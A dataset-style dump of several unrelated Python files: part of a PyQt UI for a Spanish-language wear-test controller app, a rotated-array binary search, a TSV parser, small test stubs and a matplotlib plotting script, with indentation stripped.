self.speedLabel = QtWidgets.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.speedLabel.setFont(font)
self.speedLabel.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.speedLabel.setObjectName("speedLabel")
self.horizontalLayout_6.addWidget(self.speedLabel)
spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_6.addItem(spacerItem1)
self.estimatedEndLabel = QtWidgets.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.estimatedEndLabel.setFont(font)
self.estimatedEndLabel.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.estimatedEndLabel.setObjectName("estimatedEndLabel")
self.horizontalLayout_6.addWidget(self.estimatedEndLabel)
self.horizontalLayout_6.setStretch(0, 3)
self.horizontalLayout_6.setStretch(4, 3)
self.gridLayout_2.addLayout(self.horizontalLayout_6, 1, 0, 1, 1)
self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)
self.tabWidget.setGeometry(QtCore.QRect(16, 104, 501, 417))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
self.tabWidget.setPalette(palette)
self.tabWidget.setAutoFillBackground(True)
self.tabWidget.setStyleSheet("")
self.tabWidget.setTabPosition(QtWidgets.QTabWidget.North)
self.tabWidget.setTabShape(QtWidgets.QTabWidget.Rounded)
self.tabWidget.setElideMode(QtCore.Qt.ElideNone)
self.tabWidget.setUsesScrollButtons(True)
self.tabWidget.setDocumentMode(True)
self.tabWidget.setTabsClosable(False)
self.tabWidget.setObjectName("tabWidget")
self.widget_2 = QtWidgets.QWidget()
self.widget_2.setObjectName("widget_2")
self.groupBox = QtWidgets.QGroupBox(self.widget_2)
self.groupBox.setEnabled(False)
self.groupBox.setGeometry(QtCore.QRect(4, 8, 493, 385))
font = QtGui.QFont()
font.setPointSize(-1)
font.setBold(True)
font.setWeight(75)
self.groupBox.setFont(font)
self.groupBox.setLayoutDirection(QtCore.Qt.LeftToRight)
self.groupBox.setAutoFillBackground(True)
self.groupBox.setStyleSheet("font-size: 14px;")
self.groupBox.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.groupBox.setFlat(False)
self.groupBox.setCheckable(False)
self.groupBox.setObjectName("groupBox")
self.verticalLayoutWidget_2 = QtWidgets.QWidget(self.groupBox)
self.verticalLayoutWidget_2.setGeometry(QtCore.QRect(8, 24, 469, 353))
self.verticalLayoutWidget_2.setObjectName("verticalLayoutWidget_2")
self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.verticalLayoutWidget_2)
self.verticalLayout_3.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.label_2 = QtWidgets.QLabel(self.verticalLayoutWidget_2)
font = QtGui.QFont()
font.setPointSize(-1)
font.setBold(False)
font.setWeight(50)
self.label_2.setFont(font)
self.label_2.setStyleSheet("font-size: 13px")
self.label_2.setObjectName("label_2")
self.verticalLayout_3.addWidget(self.label_2)
self.experimentNameInput = QtWidgets.QLineEdit(self.verticalLayoutWidget_2)
self.experimentNameInput.setEnabled(False)
self.experimentNameInput.setStyleSheet("font-size: 13px;")
self.experimentNameInput.setObjectName("experimentNameInput")
self.verticalLayout_3.addWidget(self.experimentNameInput)
self.label = QtWidgets.QLabel(self.verticalLayoutWidget_2)
self.label.setStyleSheet("font-size: 13px")
self.label.setObjectName("label")
self.verticalLayout_3.addWidget(self.label)
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.pathInput = QtWidgets.QLineEdit(self.verticalLayoutWidget_2)
self.pathInput.setEnabled(False)
self.pathInput.setStyleSheet("font-size: 13px;")
self.pathInput.setReadOnly(True)
self.pathInput.setObjectName("pathInput")
self.horizontalLayout_2.addWidget(self.pathInput)
self.pathBrowseBtn = QtWidgets.QToolButton(self.verticalLayoutWidget_2)
self.pathBrowseBtn.setStyleSheet("font-size: 13px;")
self.pathBrowseBtn.setObjectName("pathBrowseBtn")
self.horizontalLayout_2.addWidget(self.pathBrowseBtn)
self.verticalLayout_3.addLayout(self.horizontalLayout_2)
self.label_4 = QtWidgets.QLabel(self.verticalLayoutWidget_2)
self.label_4.setStyleSheet("font-size: 13px")
self.label_4.setObjectName("label_4")
self.verticalLayout_3.addWidget(self.label_4)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.distanciaInput = QtWidgets.QLineEdit(self.verticalLayoutWidget_2)
self.distanciaInput.setStyleSheet("font-size: 13px;")
self.distanciaInput.setObjectName("distanciaInput")
self.horizontalLayout.addWidget(self.distanciaInput)
self.label_6 = QtWidgets.QLabel(self.verticalLayoutWidget_2)
self.label_6.setStyleSheet("font-size: 13px")
self.label_6.setObjectName("label_6")
self.horizontalLayout.addWidget(self.label_6)
self.horizontalLayout.setStretch(0, 1)
self.horizontalLayout.setStretch(1, 1)
self.verticalLayout_3.addLayout(self.horizontalLayout)
self.label_5 = QtWidgets.QLabel(self.verticalLayoutWidget_2)
self.label_5.setStyleSheet("font-size: 13px")
self.label_5.setObjectName("label_5")
self.verticalLayout_3.addWidget(self.label_5)
self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.radioCombo = QtWidgets.QComboBox(self.verticalLayoutWidget_2)
self.radioCombo.setStyleSheet("font-size: 13px;")
self.radioCombo.setObjectName("radioCombo")
self.horizontalLayout_3.addWidget(self.radioCombo)
self.label_7 = QtWidgets.QLabel(self.verticalLayoutWidget_2)
self.label_7.setStyleSheet("font-size: 13px")
self.label_7.setObjectName("label_7")
self.horizontalLayout_3.addWidget(self.label_7)
self.verticalLayout_3.addLayout(self.horizontalLayout_3)
self.label_8 = QtWidgets.QLabel(self.verticalLayoutWidget_2)
self.label_8.setStyleSheet("font-size: 13px")
self.label_8.setObjectName("label_8")
self.verticalLayout_3.addWidget(self.label_8)
self.horizontalLayout_5 = QtWidgets.QHBoxLayout()
self.horizontalLayout_5.setObjectName("horizontalLayout_5")
self.cargaInput = QtWidgets.QLineEdit(self.verticalLayoutWidget_2)
self.cargaInput.setStyleSheet("font-size: 13px;")
self.cargaInput.setText("")
self.cargaInput.setObjectName("cargaInput")
self.horizontalLayout_5.addWidget(self.cargaInput)
self.label_9 = QtWidgets.QLabel(self.verticalLayoutWidget_2)
self.label_9.setStyleSheet("font-size: 13px")
self.label_9.setObjectName("label_9")
self.horizontalLayout_5.addWidget(self.label_9)
self.horizontalLayout_5.setStretch(0, 1)
self.horizontalLayout_5.setStretch(1, 1)
self.verticalLayout_3.addLayout(self.horizontalLayout_5)
self.tabWidget.addTab(self.widget_2, "")
self.tab_2 = QtWidgets.QWidget()
self.tab_2.setObjectName("tab_2")
self.groupBox_2 = QtWidgets.QGroupBox(self.tab_2)
self.groupBox_2.setEnabled(False)
self.groupBox_2.setGeometry(QtCore.QRect(4, 8, 493, 385))
font = QtGui.QFont()
font.setPointSize(-1)
font.setBold(True)
font.setWeight(75)
self.groupBox_2.setFont(font)
self.groupBox_2.setAutoFillBackground(True)
self.groupBox_2.setStyleSheet("font-size: 14px;")
self.groupBox_2.setObjectName("groupBox_2")
self.verticalLayoutWidget = QtWidgets.QWidget(self.groupBox_2)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(8, 20, 465, 357))
self.verticalLayoutWidget.setObjectName("verticalLayoutWidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setSpacing(0)
self.verticalLayout.setObjectName("verticalLayout")
self.labelOperador = QtWidgets.QLabel(self.verticalLayoutWidget)
self.labelOperador.setLayoutDirection(QtCore.Qt.LeftToRight)
self.labelOperador.setStyleSheet("font-size: 13px;")
self.labelOperador.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.labelOperador.setObjectName("labelOperador")
self.verticalLayout.addWidget(self.labelOperador)
self.operarioInput = QtWidgets.QLineEdit(self.verticalLayoutWidget)
self.operarioInput.setStyleSheet("font-size: 13px;")
self.operarioInput.setInputMask("")
self.operarioInput.setText("")
self.operarioInput.setObjectName("operarioInput")
self.verticalLayout.addWidget(self.operarioInput)
self.label_11 = QtWidgets.QLabel(self.verticalLayoutWidget)
self.label_11.setStyleSheet("font-size: 13px;")
self.label_11.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.label_11.setObjectName("label_11")
self.verticalLayout.addWidget(self.label_11)
self.probetaInput = QtWidgets.QLineEdit(self.verticalLayoutWidget)
self.probetaInput.setStyleSheet("font-size: 13px;")
self.probetaInput.setText("")
self.probetaInput.setObjectName("probetaInput")
self.verticalLayout.addWidget(self.probetaInput)
self.label_12 = QtWidgets.QLabel(self.verticalLayoutWidget)
self.label_12.setStyleSheet("font-size: 13px;")
self.label_12.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.label_12.setObjectName("label_12")
self.verticalLayout.addWidget(self.label_12)
self.materialInput = QtWidgets.QLineEdit(self.verticalLayoutWidget)
self.materialInput.setStyleSheet("font-size: 13px;")
self.materialInput.setText("")
self.materialInput.setClearButtonEnabled(False)
self.materialInput.setObjectName("materialInput")
self.verticalLayout.addWidget(self.materialInput)
self.label_13 = QtWidgets.QLabel(self.verticalLayoutWidget)
self.label_13.setStyleSheet("font-size: 13px;")
self.label_13.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.label_13.setObjectName("label_13")
self.verticalLayout.addWidget(self.label_13)
self.durezaInput = QtWidgets.QLineEdit(self.verticalLayoutWidget)
self.durezaInput.setStyleSheet("font-size: 13px;")
self.durezaInput.setText("")
self.durezaInput.setObjectName("durezaInput")
self.verticalLayout.addWidget(self.durezaInput)
self.label_14 = QtWidgets.QLabel(self.verticalLayoutWidget)
self.label_14.setStyleSheet("font-size: 13px;")
self.label_14.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.label_14.setObjectName("label_14")
self.verticalLayout.addWidget(self.label_14)
self.tratamientoInput = QtWidgets.QLineEdit(self.verticalLayoutWidget)
self.tratamientoInput.setStyleSheet("font-size: 13px;")
self.tratamientoInput.setText("")
self.tratamientoInput.setObjectName("tratamientoInput")
self.verticalLayout.addWidget(self.tratamientoInput)
self.label_15 = QtWidgets.QLabel(self.verticalLayoutWidget)
self.label_15.setStyleSheet("font-size: 13px;")
self.label_15.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.label_15.setObjectName("label_15")
self.verticalLayout.addWidget(self.label_15)
self.bolillaCombo = QtWidgets.QComboBox(self.verticalLayoutWidget)
self.bolillaCombo.setObjectName("bolillaCombo")
self.verticalLayout.addWidget(self.bolillaCombo)
self.label_16 = QtWidgets.QLabel(self.verticalLayoutWidget)
self.label_16.setStyleSheet("font-size: 13px;")
self.label_16.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.label_16.setObjectName("label_16")
self.verticalLayout.addWidget(self.label_16)
self.diametroBolillaInput = QtWidgets.QLineEdit(self.verticalLayoutWidget)
self.diametroBolillaInput.setStyleSheet("font-size: 13px;")
self.diametroBolillaInput.setText("")
self.diametroBolillaInput.setObjectName("diametroBolillaInput")
self.verticalLayout.addWidget(self.diametroBolillaInput)
self.tabWidget.addTab(self.tab_2, "")
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 537, 26))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.retranslateUi(MainWindow)
self.tabWidget.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "POD App"))
self.conectarBtn.setText(_translate("MainWindow", "Conectar"))
self.label_3.setText(_translate("MainWindow", "Seleccione el puerto del controlador"))
self.startBtn.setText(_translate("MainWindow", "Empezar"))
self.pauseBtn.setText(_translate("MainWindow", "Pausar"))
self.stopBtn.setText(_translate("MainWindow", "Detener"))
self.testBtn.setText(_translate("MainWindow", "Prueba"))
self.progressLabel.setText(_translate("MainWindow", "554 de 11605 vueltas"))
self.speedLabel.setText(_translate("MainWindow", "10.0 cm/s"))
self.estimatedEndLabel.setText(_translate("MainWindow", "Finaliza: 13:15"))
self.groupBox.setTitle(_translate("MainWindow", "Configuración del ensayo"))
self.label_2.setText(_translate("MainWindow", "Nombre del experimento"))
self.label.setText(_translate("MainWindow", "Seleccione carpeta de destino para guardar datos del ensayo:"))
self.pathBrowseBtn.setText(_translate("MainWindow", "..."))
self.label_4.setText(_translate("MainWindow", "Distancia"))
self.label_6.setText(_translate("MainWindow", "m"))
self.label_5.setText(_translate("MainWindow", "Radio"))
self.label_7.setText(_translate("MainWindow", "mm"))
self.label_8.setText(_translate("MainWindow", "Carga"))
self.label_9.setText(_translate("MainWindow", "N"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.widget_2), _translate("MainWindow", "Configuración del ensayo"))
self.groupBox_2.setTitle(_translate("MainWindow", "Datos del ensayo"))
self.labelOperador.setText(_translate("MainWindow", "Operador"))
self.operarioInput.setPlaceholderText(_translate("MainWindow", "Operador"))
self.label_11.setText(_translate("MainWindow", "Probeta"))
self.probetaInput.setPlaceholderText(_translate("MainWindow", "Probeta"))
self.label_12.setText(_translate("MainWindow", "Material"))
self.materialInput.setPlaceholderText(_translate("MainWindow", "Material"))
self.label_13.setText(_translate("MainWindow", "Dureza (HV)"))
self.durezaInput.setPlaceholderText(_translate("MainWindow", "Dureza"))
self.label_14.setText(_translate("MainWindow", "Tratamiento"))
self.tratamientoInput.setPlaceholderText(_translate("MainWindow", "Tratamiento"))
self.label_15.setText(_translate("MainWindow", "Bolilla"))
self.label_16.setText(_translate("MainWindow", "Diámetro de la bolilla (mm)"))
self.diametroBolillaInput.setPlaceholderText(_translate("MainWindow", "Diámetro de la bolilla"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate("MainWindow", "Datos del ensayo"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
| python |
from tests.utils import W3CTestCase
class TestGridPositionedItemsContentAlignment(W3CTestCase):
vars().update(W3CTestCase.find_tests(__file__, 'grid-positioned-items-content-alignment-'))
| python |
def search(nums: list[int], target: int) -> int:
start, end = 0, len(nums) - 1
while start + 1 < end:
mid = (start + end) // 2
if nums[mid] == target:
return mid
# Situaion 1: mid is in the left ascending part
if nums[mid] > nums[start]:
if target >= nums[start] and target < nums[mid]:
end = mid
else:
start = mid
# Situaion 2: mid is in the right ascending part
else:
if target <= nums[end] and target > nums[mid]:
start = mid
else:
end = mid
if nums[start] == target:
return start
if nums[end] == target:
return end
return -1
if __name__ == "__main__":
print(search([4,5,6,7,0,1,2], 0))
print(search([4,5,6,7,0,1,2], 3))
print(search([1], 0))
print(search([1,3,5], 1))
print(search([5,1,3], 5)) | python |
from .csv_parser import Parser as BaseParser
class Parser(BaseParser):
"""Extract text from tab separated values files (.tsv).
"""
delimiter = '\t'
| python |
from mbctl import cli
def test_cli_ok():
cli.run(['list'])
| python |
# -*- coding: utf-8 -*-
"""
Created on Sun Dec 5 00:25:04 2021
@author: Perry
"""
# import csv and matplotlib
import csv
import matplotlib.pyplot as plt
# read data.csv into a dictionary called data
data = csv.DictReader(open("data.csv"))
# split the data into three lists for x, y, and z
dataArrays = {"time": [], "x": [], "y": [], "z": [], "vx": [], "vy": [], "vz": [], "ax": [], "ay": [], "az": []}
for row in data:
for key in dataArrays:
dataArrays[key].append(float(row[key]))
# Plot x, y, and z velocity
plt.subplot(221)
plt.title("Velocity")
plt.xlabel("Time (s)")
plt.ylabel("Velocity (m/s)")
plt.plot(dataArrays["time"], dataArrays["vx"], label="x", color="red")
plt.plot(dataArrays["time"], dataArrays["vy"], label="y", color="green")
plt.plot(dataArrays["time"], dataArrays["vz"], label="z", color="blue")
plt.grid(True)
plt.legend()
# Plot x, y, and z acceleration
plt.subplot(223)
plt.title("Acceleration")
plt.xlabel("Time (s)")
plt.ylabel("Acceleration (m/s^2)")
plt.plot(dataArrays["time"], dataArrays["ax"], label="x", color="red")
plt.plot(dataArrays["time"], dataArrays["ay"], label="y", color="green")
plt.plot(dataArrays["time"], dataArrays["az"], label="z", color="blue")
plt.grid(True)
plt.legend()
plt.subplot(122, projection='3d')
plt.title("Position")
plt.plot(dataArrays["x"], dataArrays["y"], dataArrays["z"], label="3D Trajectory", color="black")
plt.grid(True)
plt.show() | python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.